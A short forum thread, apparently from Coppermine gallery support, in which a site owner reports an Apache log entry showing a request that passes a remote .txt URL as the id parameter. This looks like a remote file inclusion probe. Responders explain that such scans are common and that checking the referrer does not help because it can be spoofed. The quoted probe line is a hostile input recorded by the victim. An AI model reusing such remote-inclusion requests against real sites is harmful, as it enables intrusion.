I suppose it's security issue

[natalina]

Hi I've just found something strange. My gallery' s index page is index.php & until yesterday I had login form & languagers bar. Occasionaly last night I found strange logs (apache)/ They look like: GET /architect_gallery/index.php?id=http://www.donche.net/donche.txt HTTP/1.1" 200 65612 "-" "Mozilla/3.0 (compatible; Indy Library)" So if u add id= http.bla.bla.com/ bla txt or php Coppermine think's it's OK. As a result u wiil see this strange referrer in your code not only in index page but everythere (if u have login form)/ Maybe I'm wrong (hope so!) but I'm afraid that this way somebody can inject some kind of virus to the site. File donche.txt  seems to me very suspicious. I' am editor & my knowledge is 2 poor but I decided to share my notices in order to prevent troubles. Sorry for my English

[Nibbler]

People scan for vulnerable websites all the time, don't worry about it.

[natalina]

Thank u so much , but I would like to know if I can add to login.php something like  if referrer is "index.php id=http", $referer = "goaway.php" else if ......  Because of my poor php I can't write this condition properly (:

[Joachim Müller]

The attacker will stop sending referers if you check them.

[natalina]

Thank u I do check it but he (or they) have few addresses ( I discovered 4 sites)/ I' m afraid that he'll use another address. One of them is at geocity, another - phase-lm.co.uk etc...

[Joachim Müller]

The referer address can be spoofed (faked) or the attacker can set up his attacking script to just stop sending the referers at all. So there is no use in checking them.